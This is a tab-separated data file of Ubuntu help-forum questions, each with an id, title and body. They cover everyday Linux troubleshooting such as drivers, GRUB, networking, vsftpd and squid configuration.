368294	mobile broadband not connect without unplug and plug	i have recently installed ubuntu 13.10 and i am still very new in this operating system . my problem is that when i start my computer , it detects all the wifi connections around but not my mobile broadband usb connection ( huwaie ) . after startup the network-manager does n't display the mobile broadband section . the network-manager shows this section only after unplugging and then replugging my usb-modem . i do n't like to unplug and then replug my device since it might ruin/loosen my usb-port . it 's okay to have the modem always in , even when the laptop is shutdown . the usb-modem should be auto-detected by ubuntu directly after startup . can someone please help me ? thanks in advance .
368295	problems with `` make ''	just got a [ really cheap ] new machine and am trying to install ubuntu 12.10 on it -- unfortunately the laptop is so bad that there are no drivers in place to connect the hardware to the internet . i have the tarballs for the drivers sitting on the desktop ( other computer- > usb- > desktop ) , but when i try to `` make '' them , i get this error message : make : *** /lib/modules/3.5.0-17-generic/build : no such file or directory . stop . unfortunately , again , i have no internet connection so i ca n't magically run a 'apt-get update ' or something-like-that command . what should i do ? !
368296	cant install ubuntu on my msi+amd pc	i have tired to install ubuntu on my pc several times but it shows a black/rubbish screen when i boot it from cd . here is my pc config : amd fx-8120 8-core processor msi 990xa-gd55 graphics 2gb ati readeon 6670hd ram : 4gb please help me .
368297	antivirus for ubuntu 13.10 ?	i am a new ubuntu user who has installed ubuntu on my laptop . do you need to install antivirus software in ubuntu ? what antivirus software applications are recommended ? are there any free antivirus applications that are compatible with ubuntu ?
368298	what is the best linux os for my desktop having a maximum resolution of 1024x768 ?	my system configuration is amd athlon ( tm ) le 1640 processor with 2gb ram with a vga card , which supports a maximum screen resolution of 1024x768 . i have installed ubuntu 11.04 in my pc , but it has expired . i have tried ubuntu 12.04.3 and ubuntu 13.10 , but failed due to an input not supported error . please recommend the best ubuntu version .
368299	ubuntu installation failure	i am trying to install ubuntu 12.04 version using vm virtual box . i have windows 7 home premium machine . the things i did : installed oracle 's vm virtual box downloaded desktop version of ubuntu 's 32 bit 12.04 version iso file created a new session in vm virtual box by opting ubuntu . for this i choose , dynamic allocation , 2048 mb ram , 60 gb , provided the path of iso file i downloaded after clicking start , it shows me screen to install . i selected the appropriate options . everything goes well . after sometime it says installation is complete and asks to restart . if i click restart , my machine freezes and a window pop up comes saying things got corrupted and windows will look for best option for solution . after clicking that , it goes back to start i.e. , in vm box , i see the machine as aborted status , so if i click that , it starts again from start , i.e. , it ask me to install ubuntu again . i tried even the latest version of ubuntu and the same issue happens .
368304	other people 's files showing up in rhythmbox	i have my computer connected to a college network , and right now files that belong to other individuals on campus are showing up under shared in rhythmbox . this is driving me up the wall , i absolutely despise the idea that files are being thrown around on the network and that other people 's s*** is showing up on my computer , and that they may be able to see my files as well . this is a very , very serious problem as far as i am concerned and i want to know how i can ensure that i am sharing nothing with the network in the way of files on my computer and that no one else 's files are showing up on my computer .
368307	weird ( apparently ) video-related crashes	i have been having occasional video-related crashes since 12.10 . recently , both on 13.04 and 13.10 , they 've been happening frequently . my computer is a gateway dx4840-37 with an intel i5 650 processor , gma hd graphics and 4 gb ram . the crash comes on suddenly and pieces of a purple , green , black and white test pattern show up on screen . ( these may go away after a while , but the computer stays frozen . ) if any sound was playing , it loops . the computer responds to nothing ( even reisub fails ) and i have to use the power button to reboot it . the really weird thing about these crashes is that they happen early or not at all . if the computer has n't frozen within the first ~15 minutes of usage , it can function all day with no problems . other than that , no particular application or ( visible ) action seems to be associated with them . what could this be and how can i fix it ?
368310	apt-get not recognizing downloaded archives	i installed ubuntu gnome 13.10 . i previously had ubuntu gnome 13.04 and had all the archives in the /var/cache/apt/archives/ stored to a removable disk . after installing 13.10 i copied all my archives to the above mentioned path . when i run apt-get install it tries to fetch the archives although i have the archives . also if instead of apt-get install if i try to install individual .deb files using dpkg -i everything runs fine . these are the permissions of files : how do i fix this . previously copying archives like this worked fine and downloading duplicates the files .
368311	`` normal '' variables in upstart	i have n't quite figured out , how to use `` normal '' bash variables in an upstart script . basically , i just want to do this . daemon= '' /usr/bin/redis-server '' daemon_args= '' /etc/redis/redis.conf '' rundir= '' /var/run/redis '' pidfile= '' $ rundir/redis-server.pid '' pre-start script mkdir -p /media/redis/ mkdir -p /var/log/redis/ mkdir -p $ rundir touch $ pidfile chown redis : redis $ rundir $ pidfile chmod 755 $ rundir end script start on runlevel [ 2345 ] stop on runlevel [ 06 ] script echo $ daemon exec start-stop-daemon -- start -- quiet -- umask 007 -- pidfile $ pidfile -- chuid redis : redis -- exec $ daemon -- $ daemon_args end script but , of course , this does n't work . prefixing the variable declarations with env kinda works , but does n't allow for interpolation . # using `env` the variables are accessible in the entire file . env daemon= '' /usr/bin/redis-server '' env daemon_args= '' /etc/redis/redis.conf '' env rundir= '' /var/run/redis '' env pidfile= '' $ rundir/redis-server.pid '' # however interpolation does n't work # `echo $ pidfile` - > $ rundir/redis-server.pid if i move the variable declaration inside a block ( like pre-start or script ) , they work , but only inside that block . if i define them in the pre-start block , they are undefined in the main block . there has to be a sane way of doing this .
368312	error in installation of xournal	root @ bt : ~ # sudo apt-get install xournal reading package lists ... done building dependency tree reading state information ... done you might want to run `apt-get -f install ' to correct these : the following packages have unmet dependencies : g++ : depends : cpp ( > = 4:4.7.2-1 ) but 4:4.4.3-1ubuntu1 is to be installed depends : gcc ( > = 4:4.7.2-1 ) but 4:4.4.3-1ubuntu1 is to be installed depends : g++-4.7 ( > = 4.7.2-1~ ) but it is not going to be installed depends : gcc-4.7 ( > = 4.7.2-1~ ) but it is not going to be installed google-chrome-stable : depends : gconf-service but it is not going to be installed depends : libasound2 ( > = 1.0.23 ) depends : libgconf-2-4 ( > = 2.31.1 ) but it is not going to be installed depends : libgcrypt11 ( > = 1.4.5 ) but 1.4.4-5ubuntu2.1 is to be installed depends : libgdk-pixbuf2.0-0 ( > = 2.22.0 ) but it is not going to be installed depends : libgtk2.0-0 ( > = 2.24.0 ) but 2.20.1-0ubuntu2.1 is to be installed depends : libnspr4 ( > = 1.8.0.10 ) but it is not going to be installed depends : libnss3 ( > = 3.14.3 ) but it is not going to be installed depends : libstdc++6 ( > = 4.6 ) but 4.4.3-4ubuntu5.1 is to be installed depends : libx11-6 ( > = 2:1.4.99.1 ) but 2:1.3.2-1ubuntu3 is to be installed xournal : depends : libfontconfig1 ( > = 2.9.0 ) but 2.8.0-2ubuntu1 is to be installed depends : libgdk-pixbuf2.0-0 ( > = 2.22.0 ) but it is not going to be installed depends : libpoppler-glib8 ( > = 0.18 ) but it is not going to be installed depends : ghostscript-x but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) i am using root @ bt : ~ # uname -a linux bt 3.2.6 # 1 smp fri feb 17 10:34:20 est 2012 x86_64 gnu/linux root @ bt : ~ # lsb_release -sc lucid
368315	how to get rid of /dev/loopn	on my ubuntu 13.04 lenovo notebook , i tried to create a bootable usb stick with ubuntu 13.10 for a macbook air decided to go to ubuntu too . the `` startmedienersteller '' ( sorry , german ui , may be start media creator in english ) first failed several times but finally finished normally . even then the usb stick does not boot on the macbook air ( which the 13.04 version created on windows machine did ) , but this is another story . when i now look into `` sytem端berwachung '' in the tab `` file systems '' i now find a bunch of new , 100 % full , filesystems /dev/loop0 881m 881m 0 100 % /tmp/tmp0hoyt9 /dev/loop1 881m 881m 0 100 % /tmp/tmpl2btns /dev/loop2 881m 881m 0 100 % /tmp/tmpqk7r4b /dev/loop3 881m 881m 0 100 % /tmp/tmpn_38uh /dev/loop4 881m 881m 0 100 % /tmp/tmpre2ggl /dev/loop5 881m 881m 0 100 % /tmp/tmpdm2dh8 mount tells me for each of these file systems /home/bier/downloads/ubuntu-13.10-desktop-amd64+mac.iso on /tmp/tmpdm2dh8 type iso9660 ( ro ) so i guess the filesystems will not really use up any recognizable disk space . nevertheless they are very disturbing in the `` system端berwachung '' so i would like to get rid of them . but how to do this ?
368317	rotate touch input with screen , asus x202e	so i just bought an asus x202e , and have installed xubuntu 13.04 on it . all working great . however , i want to be able to rotate the screen from landscape to portrait , and still use the touch . when i currently rotate it , the touch does n't correspond with it . how do i fix it ?
368318	always show windows controls even when moxamized	when a window is maximized the windows controls ( close , minimize , .. ) are hidden until you hover over them . which will be annoyance especially to my mother in the transition from the old ubuntu ( not unity ) . so i would like them to always be visible ( and i think that should be the default really ) . is this possible ?
368319	how do i setup my wifi & pppoe and use them asus x550	i have an laptop asus x550 and want to connect to wifi or pppoe but do n't know anything about both of them and fully beginner and need help to step by step setup them . i use ubuntu 13 last version thanks
368321	unable to use internet in any browser	i 'm using ubuntu 13.10 on my hp pavilion laptop . i have live net connection but still i 'm not able to use internet on browser ( firefox/chrome ) but i 'm able to use net by terminal for installing s/w or update . i checked all the system setting , it is as nornal . i also tried by reseting/reinstalling firefox still problem is there . my system is also fully updated . so can helps what is wrong there..
368323	i ca n't login as anonymous user to vsftpd server	i use ubuntu 13.10 as server and i have installed virtualbox .i install win 7 , win xp , fedora 19 in vbox as clients . now i install vsftpd on ubuntu 13.10 . when i want to connect to vsftpd from client with ftp : //192.168.56.2 on internet browser . it show me a windows for set password , username for login . i want login to vdftpd as anonymous user , but i ca n't . config file vdftpd # example config file /etc/vsftpd.conf # # the default compiled in settings are fairly paranoid . this sample file # loosens things up a bit , to make the ftp daemon more usable . # please see vsftpd.conf.5 for all compiled in defaults . # # read this : this example file is not an exhaustive list of vsftpd options . # please read the vsftpd.conf.5 manual page to get a full idea of vsftpd's # capabilities . # # # run standalone ? vsftpd can run either from an inetd or as a standalone # daemon started from an initscript . listen=yes # # run standalone with ipv6 ? # like the listen parameter , except vsftpd will listen on an ipv6 socket # instead of an ipv4 one . this parameter and the listen parameter are mutually # exclusive . # listen_ipv6=yes # # allow anonymous ftp ? ( disabled by default ) anonymous_enable=yes # # uncomment this to allow local users to log in . # local_enable=yes # # uncomment this to enable any form of ftp write command . write_enable=yes # # default umask for local users is 077 . you may wish to change this to 022 , # if your users expect that ( 022 is used by most other ftpd 's ) # local_umask=022 # # uncomment this to allow the anonymous ftp user to upload files . this only # has an effect if the above global write enable is activated . also , you will # obviously need to create a directory writable by the ftp user . anon_upload_enable=yes # # uncomment this if you want the anonymous ftp user to be able to create # new directories . # anon_mkdir_write_enable=yes # # activate directory messages - messages given to remote users when they # go into a certain directory . # dirmessage_enable=yes # # if enabled , vsftpd will display directory listings with the time # in your local time zone . the default is to display gmt . the # times returned by the mdtm ftp command are also affected by this # option . use_localtime=yes # # activate logging of uploads/downloads . xferlog_enable=yes # # make sure port transfer connections originate from port 20 ( ftp-data ) . connect_from_port_20=yes # # if you want , you can arrange for uploaded anonymous files to be owned by # a different user . note ! using `` root '' for uploaded files is not # recommended ! # chown_uploads=yes # chown_username=whoever # # you may override where the log file goes if you like . the default is shown # below . # xferlog_file=/var/log/vsftpd.log # # if you want , you can have your log file in standard ftpd xferlog format . # note that the default log file location is /var/log/xferlog in this case . # xferlog_std_format=yes # # you may change the default value for timing out an idle session . # idle_session_timeout=600 # # you may change the default value for timing out a data connection . # data_connection_timeout=120 # # it is recommended that you define on your system a unique user which the # ftp server can use as a totally isolated and unprivileged user . # nopriv_user=ftpsecure # # enable this and the server will recognise asynchronous abor requests . not # recommended for security ( the code is non-trivial ) . not enabling it , # however , may confuse older ftp clients . # async_abor_enable=yes # # by default the server will pretend to allow ascii mode but in fact ignore # the request . turn on the below options to have the server actually do ascii # mangling on files when in ascii mode . # beware that on some ftp servers , ascii support allows a denial of service # attack ( dos ) via the command `` size /big/file '' in ascii mode . vsftpd # predicted this attack and has always been safe , reporting the size of the # raw file . # ascii mangling is a horrible feature of the protocol . # ascii_upload_enable=yes # ascii_download_enable=yes # # you may fully customise the login banner string : # ftpd_banner=welcome to blah ftp service . # # you may specify a file of disallowed anonymous e-mail addresses . apparently # useful for combatting certain dos attacks . # deny_email_enable=yes # ( default follows ) # banned_email_file=/etc/vsftpd.banned_emails # # you may restrict local users to their home directories . see the faq for # the possible risks in this before using chroot_local_user or # chroot_list_enable below . # chroot_local_user=yes # # you may specify an explicit list of local users to chroot ( ) to their home # directory . if chroot_local_user is yes , then this list becomes a list of # users to not chroot ( ) . # ( warning ! chroot'ing can be very dangerous . if using chroot , make sure that # the user does not have write access to the top level directory within the # chroot ) # chroot_local_user=yes # chroot_list_enable=yes # ( default follows ) # chroot_list_file=/etc/vsftpd.chroot_list # # you may activate the `` -r '' option to the builtin ls . this is disabled by # default to avoid remote users being able to cause excessive i/o on large # sites . however , some broken ftp clients such as `` ncftp '' and `` mirror '' assume # the presence of the `` -r '' option , so there is a strong case for enabling it . # ls_recurse_enable=yes # # customization # # some of vsftpd 's settings do n't fit the filesystem layout by # default . # # this option should be the name of a directory which is empty . also , the # directory should not be writable by the ftp user . this directory is used # as a secure chroot ( ) jail at times vsftpd does not require filesystem # access . # secure_chroot_dir=/var/run/vsftpd/empty # # this string is the name of the pam service vsftpd will use . pam_service_name=vsftpd # # this option specifies the location of the rsa certificate to use for ssl # encrypted connections . rsa_cert_file=/etc/ssl/certs/ssl-cert-snakeoil.pem # this option specifies the location of the rsa key to use for ssl # encrypted connections . rsa_private_key_file=/etc/ssl/private/ssl-cert-snakeoil.key anon_root=/home/behrooz/ftp
368325	how to clear browser 's cache and cookies from terminal	i want to clear my firefox cache and cookies from terminal.what can i do ?
368327	how to run ubuntu in windows 7 like a app ?	i want to start using ubuntu for programming purpose . before i download it , i want to make sure that i can run it without removing windows 7 . which version i should use ? can i use it without partitioning my drives ? ? ?
368329	unsupported software ?	i came across this command in the lubuntu users mailing list : ubuntu-support-status -- show-all when i ran it after sudo apt-get update and sudo apt-get dist-upgrade , the summary at the top shows this : [ 11:38 am ] ~ $ ubuntu-support-status -- show-all support status summary of 'vasa1-inspiron-1545 ' : you have 1059 packages ( 82.5 % ) supported until july 2014 ( 9m ) you have 224 packages ( 17.4 % ) that are unsupported among the `` unsupported '' software , i see : aria2 audacity flashplugin-installer geany gnome-icon-theme-full gnome-mplayer gnome-system-tools openbox pcmanfm synaptic thunar ttf-mscorefonts-installer my os is lubuntu 13.10 . any idea why such common software is shown as `` unsupported '' ? my question may be related to how do you use or what is wrong with ubuntu-support-status ? but i do n't think it 's a duplicate . and i do n't think it 's covered by this bug : https : //bugs.launchpad.net/ubuntu/+source/update-manager/+bug/849532
368330	extrnal hard disk malfunction	i bought external hard disc verbatim 53021/500 gb and it worked perfectly for about 1 year . than it suddenly became `` read only '' device . there is only 63.7 gb of its 500 gb memory used . as it still has been working without any difficulty when connected to computer running on ms windows , i am afraid the issue came with any linux update for about half year ago . can you , please , direct me to solve this riddle ? thank you so much in advance , stepan
368332	is it possible to configure two sound profiles for the same geforce gtx 660 card ?	i just bought a new asus monitor that only supports vga and hdmi input , and i have an hdtv with hdmi input . i also have a geforce gtx 660 graphics card . until now , i 've had no trouble with sound , since my previous monitor did not have a sound option , but now even though i am using a dvi - > hdmi cable to connect the monitor , if i choose the first option ( for hdmi device for the gk106 audio controller ) in pav control , i can have sound from the monitor 's speakers , and if i choose the 3rd option the sound comes through the tv . is it possible to `` clone '' this entry so i can choose the monitor in the playback tab rather than choose either the tv or the monitor ? i do n't plan on running them simultaneously , but it would be nice to put audio on the monitor and xbmc on the tv so i do n't have to switch the hdmi device each time . sorry for the long question , i hope it was clear enough . it 's very similar to this question , but different enough i feel that it needs a new question : other question
368335	ntp service , offset increasing after sync	i have installed ubuntu 12.10 version on my pc . i am running ntp service having ntp server as gps . i found that when we start ntp service by ntp start command , pc is able to sync with gps as i get '* ' symbol before gps ip when i run ntpq -p command . this remains good for some time and then the * symbol is removed which means that pc is not synchronized to that server . now , by running command ntpq -p it shows that all parameter are ok but as '* ' is removed , slowly offset goes on increasing . remote refid st t when poll reach delay offset jitter ============================================================================== *192.168.100.33 .gps . 1 u 7 16 1 2.333 23.799 0.808 remote refid st t when poll reach delay offset jitter ============================================================================== *192.168.100.33 .gps . 1 u 14 16 3 2.333 23.799 0.879 remote refid st t when poll reach delay offset jitter ============================================================================== *192.168.100.33 .gps . 1 u 11 16 7 2.333 23.799 1.500 remote refid st t when poll reach delay offset jitter ============================================================================== *192.168.100.33 .gps . 1 u 8 16 17 2.333 23.799 2.177 below are the last 4 ntp status when sync is lost with gps ============================================================================== 192.168.100.33 .gps . 1 u 1 16 377 2.404 1169.94 1.735 remote refid st t when poll reach delay offset jitter ============================================================================== 192.168.100.33 .gps . 1 u - 16 377 2.513 1171.80 0.898 remote refid st t when poll reach delay offset jitter ============================================================================== 192.168.100.33 .gps . 1 u 15 16 377 2.513 1171.80 0.898 since , gps is already available , pc never re-synchronize itself to gps later on . i have to restart the ntp service and then pc synchronizes to gps and '* ' symbol arrives .
368336	fix grub boot loader after partition	i have a system with dual boot for windows 7 and ubuntu 12.04 . the system uses grub as its boot loader . but , today by mistake , i shrank the windows volume and created a new volume and all worked fine , except when i restarted to discover that boot-loader has gone wrong . it displays : error : no such partition grub rescue > i ran through google and several forums to finally discover many things . such as : grub rescue > ls ( hd0 ) ( hd0 , msdos5 ) ( hd0 , msdos4 ) ( hd0 , msdos3 ) ( hd0 , msdos1 ) now , i can load back to grub-menu and boot into ubuntu as well as windows normally , but by fighting with grub-rescue as : grub rescue > set root= ( hd0,3 ) /boot/grub grub rescue > set prefix= ( hd0,3 ) /boot/grub grub rescue > insmod normal grub rescue > normal although , this takes to grub-menu for choosing os , but i want to get away with this . how , can i fix the grub to get back the screen as earlier ? probably , it requires some resetting in grub , which i ca n't figure out . please provide any method . ps : try to suggest a method , that uses normal user account , as i have to go more for getting sudo password . thanks .
368338	dual boot ( ubuntu/xp ) error : no video mode activated	i can boot ubuntu without issue , though i ca n't boot up xp ( which i had initially , with empty partitions ) . i get blank screen when doing reboot for installing ubuntu and need to hit enter to restart , so i 'm not sure if there are options that i ca n't see prior to hitting enter . i then could only boot into ubuntu , directly , no boot menu . so i 've changed a few parameters in etc/default/grub as others have found success and now can hold shift and get the boot menu to appear , but when i select xp it flickers quickly with `` error : no video mode activated '' and back to boot menu . i have yet to find a solution , anyone know i need to do ? i have both ubuntu ( 12.04.3 ) and xp on disc and am using a dell inspiron laptop . thank you for your assistance .
368340	dual monitor tearing , missing compiz refresh rate,	i 've poured over dozens of forums looking for an answer to this , but i 'm stumped . i 'm using dual monitors of different resolutions and have screen tearing ( rather minor , but noticeable ) , likely caused by the different refresh rates . one screen defaults to 60hz , the other to 75 . i am able to change the refresh rates in the nvidia-settings and change them both from `` auto '' to 60hz ( both monitors support this rate ) , however , upon restart they have reset back to their default setting of `` auto '' ( auto being one at 60hz and the other at 75hz ) . previously , i had used a startup script that made ccsm force a 60hz rate ( compiz also would reset to default upon restart ) and this had fixed the issue . however , upon upgrading to 13.10 the refresh rate in ccsm is blank for me and shows nothing . if i enter anything into it , it will reset itself back to black upon hitting the back button . so , essentially , at the moment , i can not enter anything into ccsm for a refresh rate , and any settings i set in nvidia-settings do n't stick at startup . xrandr does show that the 60hz is available for the second monitor , but i am unable to find a way to ensure that it starts with that rate . and , unless i 'm reading it incorrectly , my xorg.conf does show a 60hz rate : # nvidia-settings : x configuration file generated by nvidia-settings # nvidia-settings : version 331.17 ( buildd @ rhenium ) sun oct 27 00:28:28 utc 2013 section `` serverlayout '' identifier `` layout0 '' screen 0 `` screen0 '' 0 0 inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' option `` xinerama '' `` 0 '' endsection section `` files '' endsection section `` inputdevice '' # generated from default identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` inputdevice '' # generated from default identifier `` keyboard0 '' driver `` kbd '' endsection section `` inputclass '' identifier `` mouse remap '' matchdevicepath `` /dev/input/event* '' option `` buttonmapping '' `` 1 2 3 4 5 6 7 8 9 0 0 0 0 0 0 '' endsection section `` monitor '' # horizsync source : edid , vertrefresh source : edid identifier `` monitor0 '' vendorname `` unknown '' modelname `` aoc lm720bge '' horizsync 30.0 - 83.0 vertrefresh 55.0 - 75.0 option `` dpms '' endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce gtx 560 ti '' endsection section `` screen '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 option `` stereo '' `` 0 '' option `` nvidiaxineramainfoorder '' `` dfp-0 '' option `` metamodes '' `` dvi-i-1 : 1280x1024_60 +1920+56 , dvi-i-2 : 1920x1080_60 +0+0 '' option `` sli '' `` off '' option `` multigpu '' `` off '' option `` basemosaic '' `` off '' subsection `` display '' depth 24 endsubsection endsection anyhow , any advice or suggestions anybody has would be greatly appreciated . again , i can change the refresh rate manually and everything works fine , it just does n't stick past a restart . also , i 'm not sure if it 's normal , but it only shows my smaller crappier monitor in the xorg.conf and not the larger one , though , both are in use . i 'm using ubuntu 13.10 , nvidia 331.17 , let me know if you need any more information . cheers , tara
368343	step by step guide to install drivers for my nvidia® geforce® gt 520mx graphics , optimus™ technology	i am using samsung np300e5z-s01ae notebook and it has a nvidia® geforce® gt 520mx graphics , optimus™ technology graphics card in it . please anyone tell me what 's the way to install the drivers for the device on ubuntu 13.10 ( 32-bit ) . i have already researched on the internet but the installation guides everywhere say the same thing which is quiet hard for me to understand . it says , that i have first to stop the x server and etc etc ... , but when i try that i end up installing ubuntu 13.10 again , because it just do n't give me anything at all after doing that . i was thinking , if someone can give some easy to understand step by step guide how to install it ... . it would be really helpful for me .
368348	squid delay pools	i am trying to set my squid 3.1 to make use of delay pools to stop people from hogging our internet connection . i have an proxy server running ubuntu 12.04 with squid 3.1 . i have 450 pc 's connecting to the proxy with about 980 users . not all connecting at the same time . so far everything has been working great . my only problem is that i get some people that would sit the whole day watching youtube videos and thus pulling the overall speed down . i got this how-to from this site : limiting bandwidth i have implemented it , but i am not sure if i have everything in my squid.conf file right , according to this how-to . my squid.conf files looks like this the delay pool : delay_pools 1 delay_class 1 3 delay_parameters 1 -1/-1 -1/-1 125/1000 delay_initial_bucket_level 100 acl section acl flash rep_mime_type video/x-flv acl block_site dstdomain `` /etc/squid3/blocked '' acl biz_network src 10.0.0.0/12 acl ncsa_users proxy_auth required acl biz_hours time m t w h f 07:00-21:00 http_access allow manager localhost http_access deny block_site http_reply_access deny flash http_access deny manager http_access deny ! safe_ports http_access deny connect ! ssl_ports delay_access 1 allow biz_network http_access allow ncsa_users biz_network biz_hours do i uncomment : http_access allow ncsa_users biz_network biz_hours and replace it with delay_access 1 allow ncsa_users biz_network biz_hours at the moment i have the youtube site blocked via squid , but with this being an educational institution it is not the best way , as some lecturers need youtube access . can someone help ?
368349	install ubuntu touch on my samsung galaxy note 1	i have samsung galaxy note 1 phone . can i install ubuntu touch on my phone and will it work properly on my phone ?
368351	can anyone tell me how much it takes to install ubuntu 12.04 from windows installer ?	can anyone tell me how much it takes to install ubuntu 12.04 from windows installer ?
368354	shutdown , restart and logoff buttons not working in ubuntu 13.10	i was working on ubuntu 13.10 and everything was good until i entered `` sudo shutdown -p -h now '' to shutdown my computer . after that when i switched on the power buttons under the setting icon on the top right corner wo n't work . i have cairo and the power options work for cairo . but it is annoying that my system power buttons are not functional . nothing happens on clicking them . can anyone please help .
368356	pressing and holding wacom 's tablet key ( 13.10 , 64bit )	ubuntu 13.10 , 64bit i am running my own .sh script to set up wacom tablet 's keys ( since config gui under all settings - > wacom tablet for some reason does n't allow to assign simple ctrl or shift or alt to a button ) . gfx software i am configuring this for has several shortcuts where you press a key on a keyboard and while you hold - it shows a popup on the screen . as soon as you release a key - it goes away . that works on a keyboard . now i am trying to get the same thing working if i press a key on tablet and simply hold it . however it works like pressing a key and immediately releasing it no matter how long i hold it . right now i am using this type of a command to assign a key : xsetwacom set 'wacom intuos4 6x9 pad ' button 3 'key i' wondering , whether there is a parameter which would keep the 'i ' key in pressed state as long as wacom 's button remains pressed ? thank you , maris
368357	wireless do n't show in acer aspire e1-470	i hv problem in my acer laptop . it 's do n't show wireless network in my acere1-470 . i installed ubuntu 12.04 64bit . can anybody help me ?
368360	whatsapp available for ubuntu phone ?	does someone know if there is already a whatsapp version for ubuntu phone ? i decided to install ubuntu on my android , but i do n't want to use my phone without whatsapp . thanks for every useful answer . greetz
368364	ssh : connection refused after installin freenx	i have my server with ubuntu-3.10-x64 with working connection and ping ; then i installed freenx server on my server ; then i restarted . after that i ca n't connect to my server from my laptop using ssh and command line ; even remmina says ssh connection refused . because this happened after the freenx server i think that freenx takes my ssh hostage and refuses the connection . what is the solution ?
368366	how to choose a power setting in granola using the command line ?	i guess the title says it all . i am using 13.04 and i have a package installed called granola . it is a power management system ( i think it is no longer in the repos ) . it has the commands granola , granola-gui , and granola-set-policy . i want to find the way to set the power policy through the command line so that i can set the power mode on low when booting on battery . i have no clue on how to do set the policy using the command line .
368369	simple command not executing on start up	i want a simple command mv ~/downloads/*.torrent ~/torrent-backup/ to be run everytime the system starts up . but though the commands works perfectly by itself , scheduling it as startup application does not work . please suggest .
368373	how to prevent displays being mirrored when changing the volume ?	when i change the volume using the media keys on the laptop , sometimes ( iirc always first time after reboot ) my dual monitor setup changes to 'mirror displays ' mode , which is very annoying . is there a way to prevent this ? i have a dell latitude e6420 and have experienced this behaviour on both 12.04 and 13.04 .
368374	how to add a cd/dvd booting kernel to grub	i have installed linux on my new computer and want to `` promote '' windows to the old one ( unfortunately i have to have windows for remote access to work ) . on my pc the dvd drive does not appear in the bios boot menu . booting from cd/dvd is therefore handled by the os bootloader as far as i understand . if that is correct , then an unfortunate side effect of installing ubuntu is removing the ability to boot from cd . ( the drive works , is first in the boot sequence and the cd is bootable on other machines . the motherboard is msi 945p series ms-7176 if it helps . ) i see that kernels allowing boot from cd post bios exist ( smart boot manager - smb ) . however , instructions for installing this pertains to earlier grub versions and grub does not automatically detect the sbm `` kernel '' . does anybody know how to add the sbm kernel to grub 2 on ubuntu 10.04 lts ( or a newer/better option ) ? thank you .
368375	ubuntu 13.10 - printer brother dcp j140w not work	printer brother dcp j140w installed without a problem , but it does not work . why ? what is the problem ? interestingly , the scanner is working . what 's going on ?
368376	compare a variable that can have numeric or string as value	i have a variable named seconds_behind_master from one of my scripts . the problem is that this variable can either have a numeric value or can also take a string null as its value . now , when i try to execute this script in shell it gets executed but gives a warning like this : [ : illegal number : null i believe it is due to the fact that in this case the value is null but when it compares it with numeral value 60 it gives this warning . how can i rectify it ?
368382	why ubuntu does not need anti-virus ?	why ubuntu does not need anti-virus ? ? can anybody have a explaination ? why linux os does not affected from the virus attack ? like windows does ? somewhere i read that linux os does not need anti-virus ? so tell me why ?
368383	alternative open source software to gfi end point security	what are the gui open source alternatives to gfi end point security for windows ? knowing that i 'm using ubuntu 12.04 64bit thanks in advance ...
368388	i want to know is there any other file needed along windows ubuntu installer install ubuntu ?	i want to know is there any other file needed along windows ubuntu installer install ubuntu ? i only try windows installer with no other file ... ... but fail please answer me properly and easily like a begineer
368389	ubuntu 12.04 with intel 82845g/gl graphics card	i have an old machine with the intel card in the title installed . i 'd really need to install ubuntu 12.04 on it , but that 's not just possible since the intel drivers do n't work properly . so no video acceleration , no window decorations , and lots of other issues . i do know it 's an obsolete unsupported card ( see which version of ubuntu will work out of the box on intel 82845g board ? ) but i think i read somewhere that there had been progress as of late with the latest intel drivers . my question is : is there anything i can currently do to make this card work or should i just give up on the idea and turn to lighter de like lxde or xfce ? thanks
368390	how to extract a package and all related dependencies from ubuntu install cd	i would like to fall back to a previous version of a package which is in the ubuntu install cd . in my case , it is firefox version 18.0 and ubuntu 12.04.2 iso burned to a cd . how i can extract a package and all it 's dependencies from the cd to one folder ? this is what i tried . 1 . i inserted the cd and it is got mounted automatically . 2 . started ubuntu software centre and in software sources , selected installable from cd-rom/dvd 3. tried to download the package with apt-get install firefox -d -- reinstall expecting that the package in cd will get downloaded to /var/cache/apt/archives . but it is downloading the latest package from internet , not from the cd .
368396	unable remove/reinstall libxss1 : amd	whenever i try to install anything ( software-center or apt-get ) i get an error report stating that libxss1 : amd is in a very bad inconsistent state ( translated from german ) and that i should reinstall it . that would not bother me much but i am never sure if the stuff i 'm trying will be working in the end . it really resists from being repaired apt-get install , apt-get remove , apt-get -f install , and all the usual suspects - nothing works . it always comes to : dpkg : fehler beim bearbeiten von libxss1 : amd64 ( -- configure ) : paket ist in einem sehr schlechten inkonsistenten zustand - sie sollten es nochmal installieren , bevor sie die konfiguration versuchen . fehler traten auf beim bearbeiten von : libxss1 : amd64 e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i posted the error as is , since my translation might not be exact . but i guess you can figure from my text . i found out that this file is the x screen saver . may be i should kill it before handling that file . if thats so , then how can i do this ?
368402	switch keyboard layout hotkeys do n't work on lockscreen	i 've recently upgraded to ubuntu 13.10 which has a known bug that makes it impossible to change keyboard layout via alt+shift . i installed this patch which made it possible to switch layouts again . the problem i 'm facing now is that it is still impossible to switch keyboard layout when i lock ( ctrl+alt+l ) system and press alt+shift . this way if i lock system with wrong layout enabled , i ca n't switch it to enter the password and unlock pc . i can still change layout by clicking on the layout indicator . i 'll be thankful for suggestions on solving this . i 'm aware that this is due to a bug , but how can i work around this bug in the meantime ?
